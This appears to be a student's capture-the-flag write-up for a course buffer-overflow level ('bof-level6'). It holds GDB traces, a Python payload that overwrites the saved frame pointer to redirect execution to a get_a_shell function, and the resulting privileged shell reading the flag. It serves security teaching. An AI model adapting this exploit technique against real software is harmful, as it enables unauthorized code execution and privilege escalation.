----------------
 bof-level6_
---------------
1.
Used GDB get input function  
disas receive_input 
Dump of assembler code for function receive_input:
   0x00000000004006df <+0>:	push   %rbp
   0x00000000004006e0 <+1>:	mov    %rsp,%rbp
   0x00000000004006e3 <+4>:	add    $0xffffffffffffff80,%rsp
   0x00000000004006e7 <+8>:	lea    -0x80(%rbp),%rax
   0x00000000004006eb <+12>:	mov    $0x88,%edx
   0x00000000004006f0 <+17>:	mov    %rax,%rsi
   0x00000000004006f3 <+20>:	mov    $0x0,%edi
   0x00000000004006f8 <+25>:	callq  0x400540 <read@plt>
   0x00000000004006fd <+30>:	nop
   0x00000000004006fe <+31>:	leaveq 
   0x00000000004006ff <+32>:	retq   
2.
get the address of get_a_shell
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x00000000004004e8  _init
0x0000000000400520  puts@plt
0x0000000000400530  printf@plt
0x0000000000400540  read@plt
0x0000000000400550  __libc_start_main@plt
0x0000000000400560  getegid@plt
0x0000000000400570  setregid@plt
0x0000000000400580  execl@plt
0x00000000004005a0  _start
0x00000000004005d0  deregister_tm_clones
0x0000000000400610  register_tm_clones
0x0000000000400650  __do_global_dtors_aux
0x0000000000400670  frame_dummy
0x0000000000400696  get_a_shell
0x00000000004006df  receive_input
0x0000000000400700  run
0x0000000000400738  main
0x0000000000400750  __libc_csu_init
0x00000000004007c0  __libc_csu_fini
0x00000000004007c4  _fini
3. 
set break up test where the buffer start 
disas receive_input 
Dump of assembler code for function receive_input:
   0x00000000004006df <+0>:	push   %rbp
   0x00000000004006e0 <+1>:	mov    %rsp,%rbp
   0x00000000004006e3 <+4>:	add    $0xffffffffffffff80,%rsp
   0x00000000004006e7 <+8>:	lea    -0x80(%rbp),%rax
   0x00000000004006eb <+12>:	mov    $0x88,%edx
   0x00000000004006f0 <+17>:	mov    %rax,%rsi
   0x00000000004006f3 <+20>:	mov    $0x0,%edi
   0x00000000004006f8 <+25>:	callq  0x400540 <read@plt>
   0x00000000004006fd <+30>:	nop
   0x00000000004006fe <+31>:	leaveq 
   0x00000000004006ff <+32>:	retq   
End of assembler dump.
gdb-peda$ b *receive_input +31
Breakpoint 1 at 0x4006fe
gdb-peda$ r
Starting program: /home/users/nintyfour/week2/bof-level6/bof-level6 
Now we have a buffer overflow vulnerability,
hbut the vulnerability cannot reach to the return address...
Can you exploit this program?
1234

[----------------------------------registers-----------------------------------]
RAX: 0x5 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 --> 0xa34333231 ('1234\n')
RDI: 0x0 
RBP: 0x7fffffffe3c0 --> 0x7fffffffe3e0 --> 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
RSP: 0x7fffffffe340 --> 0xa34333231 ('1234\n')
RIP: 0x4006fe (<receive_input+31>:	leaveq)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4006f3 <receive_input+20>:	mov    $0x0,%edi
   0x4006f8 <receive_input+25>:	callq  0x400540 <read@plt>
   0x4006fd <receive_input+30>:	nop
=> 0x4006fe <receive_input+31>:	leaveq 
   0x4006ff <receive_input+32>:	retq   
   0x400700 <run>:	push   %rbp
   0x400701 <run+1>:	mov    %rsp,%rbp
   0x400704 <run+4>:	sub    $0x10,%rsp
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe340 --> 0xa34333231 ('1234\n')
0008| 0x7fffffffe348 --> 0x7fffffffe4d0 --> 0x1 
0016| 0x7fffffffe350 --> 0x0 
0024| 0x7fffffffe358 --> 0x7ffff7a87409 (<_IO_new_do_write+121>:	mov    %rax,%r13)
0032| 0x7fffffffe360 --> 0x400838 ("but the vulnerability cannot reach to the return address...")
0040| 0x7fffffffe368 --> 0x7ffff7dd2620 --> 0xfbad2a84 
0048| 0x7fffffffe370 --> 0xa ('\n')
0056| 0x7fffffffe378 --> 0x400874 ("Can you exploit this program?")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x00000000004006fe in receive_input ()
gdb-peda$ x/x $rbp-0x80
0x7fffffffe340:	0x31
4.
write the python code
----------------------------------------------
#0x00 00 00 00 00 40 06 96  get_a_shell

#0x7f ff ff ff e3 40--> 0xa34333231 ('1234\n')
#!/usr/bin/env python
#        
#0x7fffffffe2f8: 0x004006fd  0x00000000  0x78787878  0x78787878
#7f ff ff ff e3 00
#
with open('input.txt','wb') as f:
        f.write("xxxxxxxx" + "\x96\x06\x40\x00\x00\x00\x00\x00" + "aaaaaaaa" * (128/8 - 2) + "\x40\xe3\xff\xff\xff\x7f")
---------------------------------------------------------------------------------
5.
xxd input.txt
$ xxd input.txt 
00000000: 7878 7878 7878 7878 9606 4000 0000 0000  xxxxxxxx..@.....
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 40e3 ffff ff7f                           @.....
6.
set breakpoint again and run
gdb-peda$ b *receive_input +31
Breakpoint 1 at 0x4006fe
gdb-peda$ r < input.txt
Starting program: /home/users/nintyfour/week2/bof-level6/bof-level6 < input.txt
Now we have a buffer overflow vulnerability,
hbut the vulnerability cannot reach to the return address...
Can you exploit this program?

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7fffffffe3c0 --> 0x7fffffffe340 ("xxxxxxxx\226\006@")
RSP: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RIP: 0x4006fe (<receive_input+31>:	leaveq)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4006f3 <receive_input+20>:	mov    $0x0,%edi
   0x4006f8 <receive_input+25>:	callq  0x400540 <read@plt>
   0x4006fd <receive_input+30>:	nop
=> 0x4006fe <receive_input+31>:	leaveq 
   0x4006ff <receive_input+32>:	retq   
   0x400700 <run>:	push   %rbp
   0x400701 <run+1>:	mov    %rsp,%rbp
   0x400704 <run+4>:	sub    $0x10,%rsp
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe340 ("xxxxxxxx\226\006@")
0008| 0x7fffffffe348 --> 0x400696 (<get_a_shell>:	push   %rbp)
0016| 0x7fffffffe350 ('a' <repeats 112 times>, "@\343\377\377\377\177")
0024| 0x7fffffffe358 ('a' <repeats 104 times>, "@\343\377\377\377\177")
0032| 0x7fffffffe360 ('a' <repeats 96 times>, "@\343\377\377\377\177")
0040| 0x7fffffffe368 ('a' <repeats 88 times>, "@\343\377\377\377\177")
0048| 0x7fffffffe370 ('a' <repeats 80 times>, "@\343\377\377\377\177")
0056| 0x7fffffffe378 ('a' <repeats 72 times>, "@\343\377\377\377\177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x00000000004006fe in receive_input ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RSP: 0x7fffffffe3c8 --> 0x400735 (<run+53>:	nop)
RIP: 0x4006ff (<receive_input+32>:	retq)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4006f8 <receive_input+25>:	callq  0x400540 <read@plt>
   0x4006fd <receive_input+30>:	nop
   0x4006fe <receive_input+31>:	leaveq 
=> 0x4006ff <receive_input+32>:	retq   
   0x400700 <run>:	push   %rbp
   0x400701 <run+1>:	mov    %rsp,%rbp
   0x400704 <run+4>:	sub    $0x10,%rsp
   0x400708 <run+8>:	mov    $0x400808,%edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c8 --> 0x400735 (<run+53>:	nop)
0008| 0x7fffffffe3d0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0016| 0x7fffffffe3d8 --> 0x4005a0 (<_start>:	xor    %ebp,%ebp)
0024| 0x7fffffffe3e0 --> 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0032| 0x7fffffffe3e8 --> 0x400746 (<main+14>:	mov    $0x0,%eax)
0040| 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0048| 0x7fffffffe3f8 --> 0x7ffff7a2d830 (<__libc_start_main+240>:	mov    %eax,%edi)
0056| 0x7fffffffe400 --> 0x1 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006ff in receive_input ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RSP: 0x7fffffffe3d0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
RIP: 0x400735 (<run+53>:	nop)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400726 <run+38>:	callq  0x400520 <puts@plt>
   0x40072b <run+43>:	mov    $0x0,%eax
   0x400730 <run+48>:	callq  0x4006df <receive_input>
=> 0x400735 <run+53>:	nop
   0x400736 <run+54>:	leaveq 
   0x400737 <run+55>:	retq   
   0x400738 <main>:	push   %rbp
   0x400739 <main+1>:	mov    %rsp,%rbp
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3d0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0008| 0x7fffffffe3d8 --> 0x4005a0 (<_start>:	xor    %ebp,%ebp)
0016| 0x7fffffffe3e0 --> 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0024| 0x7fffffffe3e8 --> 0x400746 (<main+14>:	mov    $0x0,%eax)
0032| 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0040| 0x7fffffffe3f8 --> 0x7ffff7a2d830 (<__libc_start_main+240>:	mov    %eax,%edi)
0048| 0x7fffffffe400 --> 0x1 
0056| 0x7fffffffe408 --> 0x7fffffffe4d8 --> 0x7fffffffe712 ("/home/users/nintyfour/week2/bof-level6/bof-level6")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400735 in run ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RSP: 0x7fffffffe3d0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
RIP: 0x400736 (<run+54>:	leaveq)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40072b <run+43>:	mov    $0x0,%eax
   0x400730 <run+48>:	callq  0x4006df <receive_input>
   0x400735 <run+53>:	nop
=> 0x400736 <run+54>:	leaveq 
   0x400737 <run+55>:	retq   
   0x400738 <main>:	push   %rbp
   0x400739 <main+1>:	mov    %rsp,%rbp
   0x40073c <main+4>:	mov    $0x0,%eax
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3d0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0008| 0x7fffffffe3d8 --> 0x4005a0 (<_start>:	xor    %ebp,%ebp)
0016| 0x7fffffffe3e0 --> 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0024| 0x7fffffffe3e8 --> 0x400746 (<main+14>:	mov    $0x0,%eax)
0032| 0x7fffffffe3f0 --> 0x400750 (<__libc_csu_init>:	push   %r15)
0040| 0x7fffffffe3f8 --> 0x7ffff7a2d830 (<__libc_start_main+240>:	mov    %eax,%edi)
0048| 0x7fffffffe400 --> 0x1 
0056| 0x7fffffffe408 --> 0x7fffffffe4d8 --> 0x7fffffffe712 ("/home/users/nintyfour/week2/bof-level6/bof-level6")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400736 in run ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7878787878787878 ('xxxxxxxx')
RSP: 0x7fffffffe348 --> 0x400696 (<get_a_shell>:	push   %rbp)
RIP: 0x400737 (<run+55>:	retq)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400730 <run+48>:	callq  0x4006df <receive_input>
   0x400735 <run+53>:	nop
   0x400736 <run+54>:	leaveq 
=> 0x400737 <run+55>:	retq   
   0x400738 <main>:	push   %rbp
   0x400739 <main+1>:	mov    %rsp,%rbp
   0x40073c <main+4>:	mov    $0x0,%eax
   0x400741 <main+9>:	callq  0x400700 <run>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe348 --> 0x400696 (<get_a_shell>:	push   %rbp)
0008| 0x7fffffffe350 ('a' <repeats 112 times>, "@\343\377\377\377\177")
0016| 0x7fffffffe358 ('a' <repeats 104 times>, "@\343\377\377\377\177")
0024| 0x7fffffffe360 ('a' <repeats 96 times>, "@\343\377\377\377\177")
0032| 0x7fffffffe368 ('a' <repeats 88 times>, "@\343\377\377\377\177")
0040| 0x7fffffffe370 ('a' <repeats 80 times>, "@\343\377\377\377\177")
0048| 0x7fffffffe378 ('a' <repeats 72 times>, "@\343\377\377\377\177")
0056| 0x7fffffffe380 ('a' <repeats 64 times>, "@\343\377\377\377\177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400737 in run ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ("xxxxxxxx\226\006@")
RDI: 0x0 
RBP: 0x7878787878787878 ('xxxxxxxx')
RSP: 0x7fffffffe350 ('a' <repeats 112 times>, "@\343\377\377\377\177")
RIP: 0x400696 (<get_a_shell>:	push   %rbp)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40068e <frame_dummy+30>:	callq  *%rax
   0x400690 <frame_dummy+32>:	pop    %rbp
   0x400691 <frame_dummy+33>:	jmpq   0x400610 <register_tm_clones>
=> 0x400696 <get_a_shell>:	push   %rbp
   0x400697 <get_a_shell+1>:	mov    %rsp,%rbp
   0x40069a <get_a_shell+4>:	push   %rbx
   0x40069b <get_a_shell+5>:	sub    $0x8,%rsp
   0x40069f <get_a_shell+9>:	mov    $0x4007d8,%edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe350 ('a' <repeats 112 times>, "@\343\377\377\377\177")
0008| 0x7fffffffe358 ('a' <repeats 104 times>, "@\343\377\377\377\177")
0016| 0x7fffffffe360 ('a' <repeats 96 times>, "@\343\377\377\377\177")
0024| 0x7fffffffe368 ('a' <repeats 88 times>, "@\343\377\377\377\177")
0032| 0x7fffffffe370 ('a' <repeats 80 times>, "@\343\377\377\377\177")
0040| 0x7fffffffe378 ('a' <repeats 72 times>, "@\343\377\377\377\177")
0048| 0x7fffffffe380 ('a' <repeats 64 times>, "@\343\377\377\377\177")
0056| 0x7fffffffe388 ('a' <repeats 56 times>, "@\343\377\377\377\177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400696 in get_a_shell ()
gdb-peda$ ni

[----------------------------------registers-----------------------------------]
RAX: 0x86 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    $0xfffffffffffff001,%rax)
RDX: 0x88 
RSI: 0x7fffffffe340 ('x' <repeats 16 times>, 'a' <repeats 112 times>, "@\343\377\377\377\177")
RDI: 0x0 
RBP: 0x7878787878787878 ('xxxxxxxx')
RSP: 0x7fffffffe348 ("xxxxxxxx", 'a' <repeats 112 times>, "@\343\377\377\377\177")
RIP: 0x400697 (<get_a_shell+1>:	mov    %rsp,%rbp)
R8 : 0x3f6d6172676f7270 ('program?')
R9 : 0x6163207974696c69 ('ility ca')
R10: 0x37b 
R11: 0x246 
R12: 0x4005a0 (<_start>:	xor    %ebp,%ebp)
R13: 0x7fffffffe4d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400690 <frame_dummy+32>:	pop    %rbp
   0x400691 <frame_dummy+33>:	jmpq   0x400610 <register_tm_clones>
   0x400696 <get_a_shell>:	push   %rbp
=> 0x400697 <get_a_shell+1>:	mov    %rsp,%rbp
   0x40069a <get_a_shell+4>:	push   %rbx
   0x40069b <get_a_shell+5>:	sub    $0x8,%rsp
   0x40069f <get_a_shell+9>:	mov    $0x4007d8,%edi
   0x4006a4 <get_a_shell+14>:	callq  0x400520 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe348 ("xxxxxxxx", 'a' <repeats 112 times>, "@\343\377\377\377\177")
0008| 0x7fffffffe350 ('a' <repeats 112 times>, "@\343\377\377\377\177")
0016| 0x7fffffffe358 ('a' <repeats 104 times>, "@\343\377\377\377\177")
0024| 0x7fffffffe360 ('a' <repeats 96 times>, "@\343\377\377\377\177")
0032| 0x7fffffffe368 ('a' <repeats 88 times>, "@\343\377\377\377\177")
0040| 0x7fffffffe370 ('a' <repeats 80 times>, "@\343\377\377\377\177")
0048| 0x7fffffffe378 ('a' <repeats 72 times>, "@\343\377\377\377\177")
0056| 0x7fffffffe380 ('a' <repeats 64 times>, "@\343\377\377\377\177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400697 in get_a_shell ()
gdb-peda$ q

7. 
 (cat input.txt;cat) | ./bof-level6
Now we have a buffer overflow vulnerability,
hbut the vulnerability cannot reach to the return address...
Can you exploit this program?

Segmentation fault (core dumped)

nintyfour@blue9057-vm-ctf1 : ~/week2/bof-level6
$ gdb --core=core
[New LWP 6651]

warning: Unexpected size of section `.reg-xstate/6651' in core file.
Core was generated by `./bof-level6'.
Program terminated with signal SIGSEGV, Segmentation fault.

warning: Unexpected size of section `.reg-xstate/6651' in core file.
#0  0x0000000000400737 in ?? ()

8.
gdb-peda$ x/100xw $rsp-0x100
0x7fffffffe248:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe258:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe268:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe278:	0x00000000	0x00000000	0xffffe300	0x00007fff
0x7fffffffe288:	0xf7b042c0	0x00007fff	0x00000088	0x00000000
0x7fffffffe298:	0xffffe300	0x00007fff	0x00000000	0x00000000
0x7fffffffe2a8:	0x676f7270	0x3f6d6172	0x74696c69	0x61632079
0x7fffffffe2b8:	0x00000000	0x00000000	0xffffe390	0x00007fff
0x7fffffffe2c8:	0xffffe2d0	0x00007fff	0x00000000	0x00000000
0x7fffffffe2d8:	0xffffe498	0x00007fff	0x00000000	0x00000000
0x7fffffffe2e8:	0xf7ffe168	0x00007fff	0x00000002	0x00000000
0x7fffffffe2f8:	0x004006fd	0x00000000	0x78787878	0x78787878<----here!
0x7fffffffe308:	0x00400696	0x00000000	0x61616161	0x61616161
0x7fffffffe318:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe328:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe338:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe348:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe358:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe368:	0x61616161	0x61616161	0x61616161	0x61616161
0x7fffffffe378:	0x61616161	0x61616161	0xffffe340	0x00007fff
0x7fffffffe388:	0x00400735	0x00000000	0x00400750	0x00000000
0x7fffffffe398:	0x004005a0	0x00000000	0xffffe3b0	0x00007fff
0x7fffffffe3a8:	0x00400746	0x00000000	0x00400750	0x00000000
0x7fffffffe3b8:	0xf7a2d830	0x00007fff	0x00000001	0x00000000
0x7fffffffe3c8:	0xffffe498	0x00007fff	0xf7ffcca0	0x00000001
gdb-peda$ q  

9. change the pyhton code

nintyfour@blue9057-vm-ctf1 : ~/week2/bof-level6
$ vim level6.py 
 
#0x00 00 00 00 00 40 06 96  get_a_shell

#0x7f ff ff ff e3 40--> 0xa34333231 ('1234\n')
#!/usr/bin/env python
#                                          
#0x7fffffffe2f8: 0x004006fd  0x00000000  0x78787878  0x78787878
#7f ff ff ff e3 00
with open('input.txt','wb') as f:
        f.write("xxxxxxxx" + "\x96\x06\x40\x00\x00\x00\x00\x00" + "aaaaaaaa" * (128/8 - 2) + "\x00\xe3\xff\xff\xff\x7f")

10.
nintyfour@blue9057-vm-ctf1 : ~/week2/bof-level6
$ python level6.py 

nintyfour@blue9057-vm-ctf1 : ~/week2/bof-level6
$ xxd input.txt 
00000000: 7878 7878 7878 7878 9606 4000 0000 0000  xxxxxxxx..@.....
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 00e3 ffff ff7f                           ......

nintyfour@blue9057-vm-ctf1 : ~/week2/bof-level6
$ (cat input.txt;cat) | ./bof-level6
Now we have a buffer overflow vulnerability,
hbut the vulnerability cannot reach to the return address...
Can you exploit this program?
Spawning a privileged shell
id
uid=1033(nintyfour) gid=50206(week2-level6-ok) groups=50206(week2-level6-ok),1033(nintyfour)
cat flag
cs519{XXXXXXXXXXXXXXXXXXXXxxx}
